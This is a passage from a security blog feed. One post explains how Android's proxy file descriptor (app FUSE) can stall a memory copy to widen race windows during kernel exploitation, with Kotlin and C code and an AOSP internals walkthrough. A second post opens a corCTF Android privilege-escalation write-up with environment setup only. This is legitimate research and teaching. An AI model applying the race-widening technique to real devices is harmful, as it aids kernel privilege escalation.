        <span class="nc">Thread</span><span class="o">.</span><span class="na">sleep</span><span class="o">(</span><span class="mi">2000</span><span class="o">)</span> <span class="c1">// [10]</span>
        <span class="k">return</span> <span class="n">n</span>
    <span class="o">}</span>
    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onWrite</span><span class="o">(</span><span class="nl">offset:</span> <span class="nc">Long</span><span class="o">,</span> <span class="nl">size:</span> <span class="nc">Int</span><span class="o">,</span> <span class="nl">data:</span> <span class="nc">ByteArray</span><span class="o">):</span> <span class="nc">Int</span> <span class="o">{</span>
        <span class="k">throw</span> <span class="nf">ErrnoException</span><span class="o">(</span><span class="s">"onWrite"</span><span class="o">,</span> <span class="nc">OsConstants</span><span class="o">.</span><span class="na">EBADF</span><span class="o">)</span>
    <span class="o">}</span>
    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onFsync</span><span class="o">()</span> <span class="o">{}</span>
    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onRelease</span><span class="o">()</span> <span class="o">{}</span>
<span class="o">}</span>
</code></pre></div></div>

<p>First, we load the <strong>shared library <code class="language-plaintext highlighter-rouge">libfuse_mmap.so</code></strong> and declare the <strong>native function <code class="language-plaintext highlighter-rouge">mmapfuse()</code></strong> [1], which was implemented in <strong>section 1.2</strong>.</p>

<p>When the activity is created, the <code class="language-plaintext highlighter-rouge">onCreate()</code> method is invoked [2], so it can be considered the entry point of the application. Next, we define several mutable state variables that persist across recompositions of the Composable by using <code class="language-plaintext highlighter-rouge">remember</code> [3].</p>

<p>After that, we use <code class="language-plaintext highlighter-rouge">LaunchedEffect(Unit)</code> [4] and <code class="language-plaintext highlighter-rouge">DisposableEffect(Unit)</code> [5] to define the prologue and epilogue handlers that run when entering and leaving the Composition.</p>

<p>The prologue handler <strong>creates a thread <code class="language-plaintext highlighter-rouge">"ProxyFDCallbacks"</code> as a proxy fd handler</strong> [6], since the proxy fd must be managed on a separate thread. Then, the <code class="language-plaintext highlighter-rouge">getSystemService()</code> function [7] is called to obtain the <code class="language-plaintext highlighter-rouge">StorageManager</code> system service. Using this handle, we can <strong>communicate with the storage manager service</strong> and request it to create a proxy fd for us by <strong>calling the <code class="language-plaintext highlighter-rouge">openProxyFileDescriptor()</code> function</strong> [8].</p>

<p>This function takes three parameters: the <strong>file open mode</strong>, the <strong>callback object</strong> and the <strong>handler whose thread runs the callbacks</strong>. Since the file mode is set to <code class="language-plaintext highlighter-rouge">ParcelFileDescriptor.MODE_READ_ONLY</code>, we can read the file but not write to it. The <code class="language-plaintext highlighter-rouge">FuseCallback</code> class [9] extends <code class="language-plaintext highlighter-rouge">ProxyFileDescriptorCallback</code> to provide custom behavior.</p>
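
<p>The bounds handling in <code class="language-plaintext highlighter-rouge">onRead()</code> can be checked in isolation. The sketch below mirrors that logic in C and evaluates it for a few requests. The function name <code class="language-plaintext highlighter-rouge">clamp_read()</code> is hypothetical, and the 4096-byte request size is an assumption standing in for a page-sized read.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;errno.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

/* Mirror of the onRead() bounds logic.
 * Returns the number of bytes copied into dst, or -EINVAL on bad input. */
static long clamp_read(const char *data, long data_size,
                       long offset, int size, char *dst) {
    if (offset &lt; 0 || size &lt; 0) return -EINVAL;
    if (offset &gt;= data_size) return 0;   /* read at or past EOF */
    long n = data_size - offset;
    if (n &gt; size) n = size;              /* never exceed the request */
    memcpy(dst, data + offset, (size_t)n);
    return n;
}

int main(void) {
    const char data[] = "from FUSE callback :)";
    long len = (long)strlen(data);        /* 21 bytes */
    char dst[4096];

    printf("%ld\n", clamp_read(data, len, 0, 4096, dst));  /* whole payload */
    printf("%ld\n", clamp_read(data, len, 16, 4096, dst)); /* tail only */
    printf("%ld\n", clamp_read(data, len, 21, 4096, dst)); /* at EOF */
    return 0;
}
</code></pre></div></div>

<p>This prints 21, 5 and 0: a request larger than the payload is simply shortened to the bytes that remain.</p>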

<p>In the <code class="language-plaintext highlighter-rouge">onRead()</code> handler, we <strong>insert a sleep call</strong> [10] before returning the read size. As a result, when <code class="language-plaintext highlighter-rouge">mmapfuse()</code> [11] is invoked, the memory copy on the mapped FUSE fd, <strong>specifically <code class="language-plaintext highlighter-rouge">memcpy(buf, ptr, 0x10)</code></strong>, <strong>blocks for two seconds</strong> while the page fault waits for the read to complete.</p>
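
<p>One way to observe the stall from native code is to time the copy. The helper <code class="language-plaintext highlighter-rouge">timed_copy_ms()</code> below is a hypothetical addition and not part of the original library. Here it copies from a plain buffer, whereas in the app the source would be the pointer returned by <code class="language-plaintext highlighter-rouge">mmap()</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;time.h&gt;

/* Copy n bytes from src to dst and return the elapsed wall-clock time in ms. */
static long timed_copy_ms(void *dst, const void *src, size_t n) {
    struct timespec start, end;
    clock_gettime(CLOCK_MONOTONIC, &amp;start);
    memcpy(dst, src, n);
    clock_gettime(CLOCK_MONOTONIC, &amp;end);
    return (end.tv_sec - start.tv_sec) * 1000L +
           (end.tv_nsec - start.tv_nsec) / 1000000L;
}

int main(void) {
    /* Stand-in source buffer; in the app this would be the mapped FUSE page. */
    const char src[] = "from FUSE callback :)";
    char dst[0x10 + 1] = {0};
    long ms = timed_copy_ms(dst, src, 0x10);
    printf("copied \"%s\" in %ld ms\n", dst, ms);
    return 0;
}
</code></pre></div></div>

<p>Against the FUSE-backed mapping, the first copy should take roughly the two seconds spent in <code class="language-plaintext highlighter-rouge">onRead()</code>, while later copies of the same page would normally be served without another callback.</p>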

<p>Later, the output of the function call is displayed on the screen by invoking <code class="language-plaintext highlighter-rouge">Text()</code> [12], which is expected to look like:</p>

<p><img src="/assets/image-20250924143618063.png" alt="image-20250924143618063" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<p>Finally, the epilogue closes the FUSE fd and releases the <code class="language-plaintext highlighter-rouge">"ProxyFDCallbacks"</code> thread.</p>

<h2 id="3-internal">3. Internal</h2>

<p>According to the <a href="https://developer.android.com/reference/android/content/Context#getSystemService(java.lang.String)">API documentation</a>, we can call <code class="language-plaintext highlighter-rouge">getSystemService()</code> to obtain a handle to a system-level service by name. This allows us to retrieve a <code class="language-plaintext highlighter-rouge">StorageManager</code> instance and call its methods.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">public</span> <span class="kd">abstract</span> <span class="nc">Object</span> <span class="nf">getSystemService</span> <span class="o">(</span><span class="nc">String</span> <span class="n">name</span><span class="o">)</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">StorageManager</code> class provides the method <code class="language-plaintext highlighter-rouge">openProxyFileDescriptor()</code>, which is implemented in <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/core/java/android/os/storage/StorageManager.java;l=2019?q=registerStorageVolumeCallback&amp;ss=android">android.os.storage.StorageManager</a>.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@SystemService</span><span class="o">(</span><span class="nc">Context</span><span class="o">.</span><span class="na">STORAGE_SERVICE</span><span class="o">)</span>
<span class="kd">public</span> <span class="kd">class</span> <span class="nc">StorageManager</span> <span class="o">{</span>
    <span class="c1">// [...]</span>
    
    <span class="kd">public</span> <span class="nd">@NonNull</span> <span class="nc">ParcelFileDescriptor</span> <span class="nf">openProxyFileDescriptor</span><span class="o">(</span>
            <span class="kt">int</span> <span class="n">mode</span><span class="o">,</span> <span class="nc">ProxyFileDescriptorCallback</span> <span class="n">callback</span><span class="o">,</span> <span class="nc">Handler</span> <span class="n">handler</span><span class="o">)</span>
                    <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span>
        <span class="nc">Preconditions</span><span class="o">.</span><span class="na">checkNotNull</span><span class="o">(</span><span class="n">handler</span><span class="o">);</span>
        <span class="k">return</span> <span class="nf">openProxyFileDescriptor</span><span class="o">(</span><span class="n">mode</span><span class="o">,</span> <span class="n">callback</span><span class="o">,</span> <span class="n">handler</span><span class="o">,</span> <span class="kc">null</span><span class="o">);</span>
    <span class="o">}</span>
    
    <span class="c1">// [...]</span>
<span class="o">}</span>
</code></pre></div></div>

<p>Internally, the method <code class="language-plaintext highlighter-rouge">mountProxyFileDescriptorBridge()</code> [1] is invoked to obtain an <code class="language-plaintext highlighter-rouge">AppFuseMount</code> object, which is then used to create the FUSE app loop that handles file operations.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">public</span> <span class="nd">@NonNull</span> <span class="nc">ParcelFileDescriptor</span> <span class="nf">openProxyFileDescriptor</span><span class="o">(</span>
        <span class="kt">int</span> <span class="n">mode</span><span class="o">,</span> <span class="nc">ProxyFileDescriptorCallback</span> <span class="n">callback</span><span class="o">,</span> <span class="nc">Handler</span> <span class="n">handler</span><span class="o">,</span> <span class="nc">ThreadFactory</span> <span class="n">factory</span><span class="o">)</span>
                <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span>
    <span class="c1">// [...]</span>
    <span class="k">while</span> <span class="o">(</span><span class="kc">true</span><span class="o">)</span> <span class="o">{</span>
        <span class="k">try</span> <span class="o">{</span>
            <span class="kd">synchronized</span> <span class="o">(</span><span class="n">mFuseAppLoopLock</span><span class="o">)</span> <span class="o">{</span>
                <span class="kt">boolean</span> <span class="n">newlyCreated</span> <span class="o">=</span> <span class="kc">false</span><span class="o">;</span>
                <span class="k">if</span> <span class="o">(</span><span class="n">mFuseAppLoop</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span>
                    <span class="kd">final</span> <span class="nc">AppFuseMount</span> <span class="n">mount</span> <span class="o">=</span> <span class="n">mStorageManager</span><span class="o">.</span><span class="na">mountProxyFileDescriptorBridge</span><span class="o">();</span> <span class="c1">// [1]</span>
                    <span class="c1">// [...]</span>
                    <span class="n">mFuseAppLoop</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">FuseAppLoop</span><span class="o">(</span><span class="n">mount</span><span class="o">.</span><span class="na">mountPointId</span><span class="o">,</span> <span class="n">mount</span><span class="o">.</span><span class="na">fd</span><span class="o">,</span> <span class="n">factory</span><span class="o">);</span>
                <span class="o">}</span>
                <span class="c1">// [...]</span>
            <span class="o">}</span>
            <span class="c1">// [...]</span>
        <span class="o">}</span>
    <span class="o">}</span>
    <span class="c1">// [...]</span>
<span class="o">}</span>
</code></pre></div></div>

<p>This call corresponds to a Binder transaction in <code class="language-plaintext highlighter-rouge">IStorageManager</code>, as defined in <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/core/java/android/os/storage/IStorageManager.aidl?q=mountProxyFileDescriptorBridge&amp;ss=android%2Fplatform%2Fsuperproject%2Fmain">IStorageManager.aidl</a>. The <code class="language-plaintext highlighter-rouge">IStorageManager</code> service <strong>runs inside <code class="language-plaintext highlighter-rouge">system_server</code></strong>, which hosts almost all of the <strong>core system services</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>interface IStorageManager {
    // [...]
    AppFuseMount mountProxyFileDescriptorBridge() = 73;
    // [...]
}
</code></pre></div></div>

<p>We can verify this information using the <code class="language-plaintext highlighter-rouge">service</code> and <code class="language-plaintext highlighter-rouge">ps</code> shell commands.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>akita:/ # service list | grep mount
242	mount: [android.os.storage.IStorageManager]

akita:/ # ps -A | grep -i system_server
system        1436   903   23594364 775776 do_epoll_wait       0 S system_server
</code></pre></div></div>

<p>The method <code class="language-plaintext highlighter-rouge">mountProxyFileDescriptorBridge()</code> is implemented in <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/services/core/java/com/android/server/StorageManagerService.java;l=3754?q=mountProxyFileDescriptorBridge&amp;ss=android%2Fplatform%2Fsuperproject%2Fmain">StorageManagerService.java</a>, where it creates an <code class="language-plaintext highlighter-rouge">AppFuseMountScope</code> object [2].</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">class</span> <span class="nc">StorageManagerService</span> <span class="kd">extends</span> <span class="nc">IStorageManager</span><span class="o">.</span><span class="na">Stub</span>
        <span class="kd">implements</span> <span class="nc">Watchdog</span><span class="o">.</span><span class="na">Monitor</span><span class="o">,</span> <span class="nc">ScreenObserver</span> <span class="o">{</span>
    <span class="c1">// [...]</span>
    
    <span class="nd">@Override</span>
    <span class="kd">public</span> <span class="nd">@Nullable</span> <span class="nc">AppFuseMount</span> <span class="nf">mountProxyFileDescriptorBridge</span><span class="o">()</span> <span class="o">{</span>
        <span class="c1">// [...]</span>
        <span class="k">while</span> <span class="o">(</span><span class="kc">true</span><span class="o">)</span> <span class="o">{</span>
            <span class="c1">// [...]</span>
            <span class="k">try</span> <span class="o">{</span>
                <span class="k">return</span> <span class="k">new</span> <span class="nf">AppFuseMount</span><span class="o">(</span>
                    <span class="n">name</span><span class="o">,</span> <span class="n">mAppFuseBridge</span><span class="o">.</span><span class="na">addBridge</span><span class="o">(</span><span class="k">new</span> <span class="nc">AppFuseMountScope</span><span class="o">(</span><span class="n">uid</span><span class="o">,</span> <span class="n">name</span><span class="o">)));</span> <span class="c1">// [2]</span>
            <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">FuseUnavailableMountException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span>
                <span class="c1">// [...]</span>
            <span class="o">}</span>
        <span class="o">}</span>
    <span class="o">}</span>

    <span class="c1">// [...]</span>
<span class="o">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">AppFuseMountScope</code> class is also defined in <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/services/core/java/com/android/server/StorageManagerService.java;l=3693?q=AppFuseMountScope&amp;ss=android%2Fplatform%2Fsuperproject%2Fmain">StorageManagerService.java</a>. Its <code class="language-plaintext highlighter-rouge">open()</code> method eventually calls <code class="language-plaintext highlighter-rouge">mVold.mountAppFuse()</code> [3] to obtain the FUSE fd.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">class</span> <span class="nc">AppFuseMountScope</span> <span class="kd">extends</span> <span class="nc">AppFuseBridge</span><span class="o">.</span><span class="na">MountScope</span> <span class="o">{</span>
    <span class="kd">private</span> <span class="kt">boolean</span> <span class="n">mMounted</span> <span class="o">=</span> <span class="kc">false</span><span class="o">;</span>

    <span class="kd">public</span> <span class="nf">AppFuseMountScope</span><span class="o">(</span><span class="kt">int</span> <span class="n">uid</span><span class="o">,</span> <span class="kt">int</span> <span class="n">mountId</span><span class="o">)</span> <span class="o">{</span>
        <span class="kd">super</span><span class="o">(</span><span class="n">uid</span><span class="o">,</span> <span class="n">mountId</span><span class="o">);</span>
    <span class="o">}</span>

    <span class="nd">@Override</span>
    <span class="kd">public</span> <span class="nc">ParcelFileDescriptor</span> <span class="nf">open</span><span class="o">()</span> <span class="kd">throws</span> <span class="nc">AppFuseMountException</span> <span class="o">{</span>
        <span class="n">extendWatchdogTimeout</span><span class="o">(</span><span class="s">"#open might be slow"</span><span class="o">);</span>
        <span class="k">try</span> <span class="o">{</span>
            <span class="kd">final</span> <span class="nc">FileDescriptor</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">mVold</span><span class="o">.</span><span class="na">mountAppFuse</span><span class="o">(</span><span class="n">uid</span><span class="o">,</span> <span class="n">mountId</span><span class="o">);</span> <span class="c1">// [3]</span>
            <span class="n">mMounted</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span>
            <span class="k">return</span> <span class="k">new</span> <span class="nf">ParcelFileDescriptor</span><span class="o">(</span><span class="n">fd</span><span class="o">);</span>
        <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">Exception</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span>
            <span class="k">throw</span> <span class="k">new</span> <span class="nf">AppFuseMountException</span><span class="o">(</span><span class="s">"Failed to mount"</span><span class="o">,</span> <span class="n">e</span><span class="o">);</span>
        <span class="o">}</span>
    <span class="o">}</span>
    <span class="c1">// [...]</span>
<span class="o">}</span>
</code></pre></div></div>

<p>The method <code class="language-plaintext highlighter-rouge">mountAppFuse()</code> is a Binder call exposed by the Vold (Volume Daemon) process, defined in <a href="https://cs.android.com/android/platform/superproject/main/+/main:system/vold/binder/android/os/IVold.aidl;l=80?q=mountAppFuse&amp;ss=android%2Fplatform%2Fsuperproject%2Fmain">IVold.aidl</a>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@SensitiveData
interface IVold {
    FileDescriptor mountAppFuse(int uid, int mountId);
}
</code></pre></div></div>

<p>Vold runs as a dedicated process and handles the FUSE open and mount operations itself:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>akita:/ # service list | grep -i vold
# [...]
368	vold: [android.os.IVold]

akita:/ # ps -A | grep -i vold
root           559     1   11025252   9996 binder_thread_read  0 S vold
</code></pre></div></div>
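
<p>At the system-call level, mounting a FUSE filesystem means opening <code class="language-plaintext highlighter-rouge">/dev/fuse</code> and handing the resulting fd to <code class="language-plaintext highlighter-rouge">mount()</code> through the <code class="language-plaintext highlighter-rouge">fd=</code> option. The following is a minimal sketch of that sequence using only the options the kernel requires (<code class="language-plaintext highlighter-rouge">fd</code>, <code class="language-plaintext highlighter-rouge">rootmode</code>, <code class="language-plaintext highlighter-rouge">user_id</code>, <code class="language-plaintext highlighter-rouge">group_id</code>). The helper names are hypothetical, and Vold's real option string and mount flags may differ.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;fcntl.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/mount.h&gt;
#include &lt;unistd.h&gt;

/* Build the mandatory FUSE mount options for an already opened /dev/fuse fd.
 * Returns the snprintf() result (length needed, excluding the NUL). */
static int build_fuse_opts(char *out, size_t cap, int fd,
                           unsigned uid, unsigned gid) {
    /* rootmode is the octal file mode of the mount root; 40000 = directory. */
    return snprintf(out, cap, "fd=%d,rootmode=40000,user_id=%u,group_id=%u",
                    fd, uid, gid);
}

/* Open /dev/fuse and mount it at path. Needs privileges; returns fd or -1. */
static int mount_fuse(const char *path, unsigned uid, unsigned gid) {
    char opts[128];
    int fd = open("/dev/fuse", O_RDWR);
    if (fd &lt; 0) return -1;
    build_fuse_opts(opts, sizeof(opts), fd, uid, gid);
    if (mount("/dev/fuse", path, "fuse", MS_NOSUID | MS_NODEV, opts) != 0) {
        close(fd);
        return -1;
    }
    return fd; /* the FUSE server reads requests from this fd */
}

int main(int argc, char **argv) {
    char opts[128];
    build_fuse_opts(opts, sizeof(opts), 3, 0, 0); /* 3 is a placeholder fd */
    printf("%s\n", opts);
    if (argc &gt; 1) { /* only attempt the real mount when a path is given */
        int fd = mount_fuse(argv[1], 0, 0);
        printf("mount %s\n", fd &gt;= 0 ? "ok" : "failed");
        if (fd &gt;= 0) close(fd);
    }
    return 0;
}
</code></pre></div></div>

<p>Run without arguments, the sketch only prints the option string <code class="language-plaintext highlighter-rouge">fd=3,rootmode=40000,user_id=0,group_id=0</code>. Whoever holds the fd afterwards acts as the filesystem server, which is why the fd is passed back to the caller.</p>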

<p>Finally, within the C++ function <a href="https://cs.android.com/android/platform/superproject/main/+/main:system/vold/AppFuseUtil.cpp;l=105?q=mountAppFuse&amp;ss=android%2Fplatform%2Fsuperproject%2Fmain"><code class="language-plaintext highlighter-rouge">MountAppFuse()</code></a>, the mount path is defined [4], the <strong><code class="language-plaintext highlighter-rouge">"/dev/fuse"</code></strong> file is opened [5], and the mount operation [6] is performed.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">MountAppFuse</span><span class="p">(</span><span class="n">uid_t</span> <span class="n">uid</span><span class="p">,</span> <span class="kt">int</span> <span class="n">mountId</span><span class="p">,</span> <span class="n">android</span><span class="o">::</span><span class="n">base</span><span class="o">::</span><span class="n">unique_fd</span><span class="o">*</span> <span class="n">device_fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="n">name</span> <span class="o">=</span> <span class="n">std</span><span class="o">::</span><span class="n">to_string</span><span class="p">(</span><span class="n">mountId</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="n">path</span><span class="p">;</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">GetMountPath</span><span class="p">(</span><span class="n">uid</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">path</span><span class="p">)</span> <span class="o">!=</span> <span class="n">android</span><span class="o">::</span><span class="n">OK</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// [4]</span>
        <span class="n">LOG</span><span class="p">(</span><span class="n">ERROR</span><span class="p">)</span> <span class="o">&lt;&lt;</span> <span class="s">"Invalid mount point name"</span><span class="p">;</span>
        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
    <span class="n">device_fd</span><span class="o">-&gt;</span><span class="n">reset</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/dev/fuse"</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">));</span> <span class="c1">// [5]</span>
    <span class="c1">// [...]</span>
    <span class="k">return</span> <span class="n">RunCommand</span><span class="p">(</span><span class="s">"mount"</span><span class="p">,</span> <span class="n">uid</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">device_fd</span><span class="o">-&gt;</span><span class="n">get</span><span class="p">());</span> <span class="c1">// [6]</span>
<span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="Android" /><summary type="html"><![CDATA[The talk KernelGP: Racing Against the Android Kernel at OffensiveCon 2025 demonstrates four techniques to leverage Android’s internal design to extend the race window during kernel exploitation. In this post, I will walk through my exploration of the first method — the proxy file descriptor — and explain how I implemented it. I’ll also share some side notes on writing an Android app.]]></summary></entry><entry><title type="html">corCTF 2025 - corphone</title><link href="https://u1f383.github.io/android/2025/09/08/corCTF-2025-corphone.html" rel="alternate" type="text/html" title="corCTF 2025 - corphone" /><published>2025-09-08T00:00:00+00:00</published><updated>2025-09-08T00:00:00+00:00</updated><id>https://u1f383.github.io/android/2025/09/08/corCTF-2025-corphone</id><content type="html" xml:base="https://u1f383.github.io/android/2025/09/08/corCTF-2025-corphone.html"><![CDATA[<p>Last week, I participated in corCTF as part of team Billy (simply because my friend Billy (@st424204) was also playing it in his free time) and solved an Android pwn challenge, <strong>corphone</strong>. Although I had some prior research experience with Android, this was the first time I successfully achieved LPE on it!</p>

<p>This post is not only a write-up for the challenge but also includes some notes on Android exploitation. Hope you find it helpful!</p>

<p>By the way, you can also refer to <a href="https://github.com/0xdevil/corphone/tree/main">this GitHub repo</a> for the author’s version of the exploitation, which should be more stable and understandable than mine.</p>

<p>Thanks to the author, devil (d3vil), for creating this awesome challenge, and to Billy for playing it with me 🙂.</p>

<h2 id="1-introduction">1. Introduction</h2>

<p>The attachment <strong><code class="language-plaintext highlighter-rouge">INSTRUCTIONS.md</code></strong> provides clear steps for setting up the environment. You can follow it to get everything ready quickly. Out of curiosity, I also analyzed the setup process. If you are not interested in how this system was built, you may skip this section.</p>

<p>After unpacking <code class="language-plaintext highlighter-rouge">corphone-local.tar.gz</code>, the output directory <code class="language-plaintext highlighter-rouge">local-docker</code> will look like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.
├── build-docker-image.sh
├── corav.diff
├── corphone
├── Dockerfile
├── exp2sc.py
├── files
│   ├── cuttlefish-packages
│   │   ├── cuttlefish-base_1.12.0_amd64.deb
│   │   └── cuttlefish-user_1.12.0_amd64.deb
│   ├── image
│   │   ├── bd.apk
│   │   ├── corctl
│   │   ├── magiskpolicy
│   │   └── mm.apk
│   └── kernel
│       ├── bzImage
│       └── initramfs.img
├── notabackdoor2-apk
│   └── notabackdoor2.zip
└── System.map
</code></pre></div></div>
<ul>
  <li><code class="language-plaintext highlighter-rouge">build-docker-image.sh</code>, <code class="language-plaintext highlighter-rouge">corphone</code>, <code class="language-plaintext highlighter-rouge">Dockerfile</code>: Scripts for setting up the environment.</li>
  <li><code class="language-plaintext highlighter-rouge">corav.diff</code>: An Android kernel patch that implements a vulnerable built-in driver.</li>
  <li><code class="language-plaintext highlighter-rouge">notabackdoor2-apk</code>: A backdoor application used for debugging and uploading exploits. This application mimics an untrusted real-world app.</li>
  <li><code class="language-plaintext highlighter-rouge">exp2sc.py</code>: Converts a static binary to shellcode, which is later executed by the backdoor application.</li>
  <li><code class="language-plaintext highlighter-rouge">files/cuttlefish-packages</code>: <a href="https://github.com/google/android-cuttlefish">Cuttlefish</a>, a Google tool for running Android Virtual Devices (AVD).</li>
  <li><code class="language-plaintext highlighter-rouge">files/image</code>: <a href="https://github.com/topjohnwu/Magisk">Magisk</a>, a rooting tool for Android. Its utility <code class="language-plaintext highlighter-rouge">magiskpolicy</code> can patch SELinux policies at runtime.
    <ul>
      <li><code class="language-plaintext highlighter-rouge">bd.apk</code> is the backdoor app, while <code class="language-plaintext highlighter-rouge">mm.apk</code> is “Mattermost,” a chatroom service.</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">files/kernel</code>: The compiled kernel and initramfs.</li>
</ul>

<p>The script <code class="language-plaintext highlighter-rouge">build-docker-image.sh</code> downloads two files: <code class="language-plaintext highlighter-rouge">android-img.zip</code> and <code class="language-plaintext highlighter-rouge">cvd-host_package.tar.gz</code>.</p>

<p>The former contains the files required for booting Android (it is unclear whether they were auto-generated or manually packaged):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.
├── android-info.txt
├── boot.img
├── fastboot-info.txt
├── init_boot.img
├── super.img
├── userdata.img
├── vbmeta.img
├── vbmeta_system_dlkm.img
├── vbmeta_system.img
├── vbmeta_vendor_dlkm.img
└── vendor_boot.img
</code></pre></div></div>

<p>The latter contains host-side components used by Cuttlefish.</p>

<p>Finally, a Docker image is built, running Cuttlefish on Debian 12.</p>

<div class="language-Dockerfile highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># [...]</span>
<span class="k">COPY</span><span class="s"> ./files/cuttlefish-packages/cuttlefish-*.deb /root/debian/</span>
<span class="k">RUN </span>apt <span class="nb">install</span> <span class="nt">-y</span> <span class="nt">--no-install-recommends</span> <span class="nt">-f</span> <span class="se">\
</span>    /root/debian/cuttlefish-base_<span class="k">*</span>.deb <span class="se">\
</span>    /root/debian/cuttlefish-user_<span class="k">*</span>.deb
<span class="c"># [...]</span>
</code></pre></div></div>

<p>After building, we can use the <code class="language-plaintext highlighter-rouge">corphone</code> script to start a Docker container. The command will then be passed through to the <code class="language-plaintext highlighter-rouge">corctl</code> script inside the container.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>run_cuttlefish<span class="o">()</span> <span class="o">{</span>
    <span class="nb">local </span><span class="nv">cmd</span><span class="o">=</span><span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span>
    docker run <span class="nt">--rm</span> <span class="nt">-it</span> <span class="se">\</span>
        <span class="nt">--name</span> corphone <span class="se">\</span>
        <span class="nt">--network</span> bridge <span class="se">\</span>
        <span class="nt">--privileged</span> <span class="se">\</span>
        <span class="nt">-v</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span><span class="s2">/volumes/kernel:/root/kernel:ro"</span> <span class="se">\</span>
        <span class="nt">-v</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span><span class="s2">/volumes/image:/root/image:rw"</span> <span class="se">\</span>
        <span class="nt">-v</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span><span class="s2">/volumes/instance:/root/instance:rw"</span> <span class="se">\</span>
        <span class="nt">-v</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span><span class="s2">/volumes/tmp:/tmp:rw"</span> <span class="se">\</span>
        cuttlefish:latest <span class="se">\</span>
        /root/image/corctl <span class="s2">"</span><span class="nv">$cmd</span><span class="s2">"</span>
<span class="o">}</span>
</code></pre></div></div>

<p>First, we execute <code class="language-plaintext highlighter-rouge">./corphone create</code> to create an instance. This triggers the <code class="language-plaintext highlighter-rouge">create_instance()</code> function.</p>

<p>Note: I removed some commands and expanded certain variables/functions for clarity.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">create_instance</span><span class="p">()</span> <span class="p">{</span>

    <span class="n">service</span> <span class="n">cuttlefish</span><span class="o">-</span><span class="n">host</span><span class="o">-</span><span class="n">resources</span> <span class="n">start</span>
    <span class="n">service</span> <span class="n">cuttlefish</span><span class="o">-</span><span class="n">operator</span> <span class="n">status</span>

    <span class="n">cvd</span> <span class="n">create</span> \
        <span class="o">--</span><span class="n">num_instances</span><span class="o">=</span><span class="mi">1</span> \
        <span class="o">--</span><span class="n">base_instance_num</span><span class="o">=</span><span class="mi">1</span> \
        <span class="o">--</span><span class="n">host_path</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">image</span> \
        <span class="o">--</span><span class="n">product_path</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">image</span> \
        <span class="o">-</span><span class="n">instance_dir</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">instance</span> \
